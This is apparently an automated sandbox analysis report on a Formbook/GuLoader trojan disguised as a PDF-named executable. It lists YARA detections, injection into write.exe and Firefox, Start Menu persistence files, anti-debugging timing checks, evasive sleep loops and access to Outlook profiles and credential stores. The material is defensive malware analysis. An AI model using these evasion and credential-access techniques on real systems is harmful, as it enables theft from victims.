Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FE9DA0 5_2_02FE9DA0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\write.exe Code function: String function: 05205050 appears 58 times
Source: C:\Windows\SysWOW64\write.exe Code function: String function: 0524EF10 appears 105 times
Source: C:\Windows\SysWOW64\write.exe Code function: String function: 0523E692 appears 86 times
Source: C:\Windows\SysWOW64\write.exe Code function: String function: 05217BE4 appears 111 times
Source: C:\Windows\SysWOW64\write.exe Code function: String function: 051BB910 appears 280 times
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: String function: 36B25050 appears 50 times
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: String function: 36B5E692 appears 80 times
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: String function: 36ADB910 appears 240 times
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: String function: 36B37BE4 appears 100 times
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: String function: 36B6EF10 appears 78 times
Sample file is different than original file name gathered from version info
Source: BM-FM_NR.24040718PDF.exe, 00000000.00000000.12883268776.0000000000481000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamebagprojektionens golfer.exe6 vs BM-FM_NR.24040718PDF.exe
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13533970795.0000000036880000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs BM-FM_NR.24040718PDF.exe
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewritej% vs BM-FM_NR.24040718PDF.exe
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13537482631.0000000036A34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs BM-FM_NR.24040718PDF.exe
Uses 32bit PE files
Source: BM-FM_NR.24040718PDF.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal96.troj.spyw.evad.winEXE@7/7@29/13
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040310F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404352
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar, 0_2_0040205E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Local\Temp\nseCCE4.tmp Jump to behavior
Source: BM-FM_NR.24040718PDF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: BM-FM_NR.24040718PDF.exe Virustotal: Detection: 12%
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File read: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Process created: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
Source: C:\Windows\SysWOW64\write.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Process created: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe" Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe" Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\write.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: BM-FM_NR.24040718PDF.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: write.pdbGCTL source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: write.pdb source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: wntdll.pdbUGP source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: BM-FM_NR.24040718PDF.exe, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, write.exe
Source: Binary string: mshtml.pdbUGP source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.13454509223.0000000007965000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_10002D20 push eax; ret 0_2_10002D4E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AB97A1 push es; iretd 2_2_36AB97A8
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AB21AD pushad ; retf 0004h 2_2_36AB223F
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051C08CD push ecx; mov dword ptr [esp], ecx 5_2_051C08D6
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FD4550 push edx; retf 5_2_02FD4551
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FC4535 push cs; ret 5_2_02FC453D
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FC6E86 pushfd ; iretd 5_2_02FC6E8B
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FC6E29 pushfd ; iretd 5_2_02FC6E8B
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FC8C36 pushfd ; iretd 5_2_02FC8C39
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FD2C18 push edi; iretd 5_2_02FD2C3A
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FDF54E push esp; iretd 5_2_02FDF550
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FDFB69 push edi; retf 5_2_02FDFB89
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FCDEE9 push ebx; retf 5_2_02FCDEEE
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FC7EA4 push es; iretd 5_2_02FC7EAC
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FCDE9B pushad ; ret 5_2_02FCDE9C
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FCDE11 push es; retf 5_2_02FCDE12
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FC3F52 push EEC03D28h; ret 5_2_02FC3F5C
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FDFCD4 push edx; iretd 5_2_02FDFD03
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FDFD04 push edx; iretd 5_2_02FDFD03
Drops PE files
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll Jump to dropped file
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Trophaeum.Uno Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Filantroper.ove Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold\Paleoatavistic.Rok179 Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold\Hjrners133.txt Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold\princelings.bar Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B21763 rdtsc 2_2_36B21763
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\write.exe Window / User API: threadDelayed 9050 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe API coverage: 0.2 %
Source: C:\Windows\SysWOW64\write.exe API coverage: 2.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\write.exe TID: 1580 Thread sleep count: 119 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 1580 Thread sleep time: -238000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 1580 Thread sleep count: 9050 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 1580 Thread sleep time: -18100000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316 Thread sleep time: -58500s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316 Thread sleep count: 58 > 30 Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316 Thread sleep time: -58000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\write.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\write.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_00406033 FindFirstFileA,FindClose, 0_2_00406033
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004055D1
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_00402688 FindFirstFileA, 0_2_00402688
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FDB810 FindFirstFileW,FindNextFileW,FindClose, 5_2_02FDB810
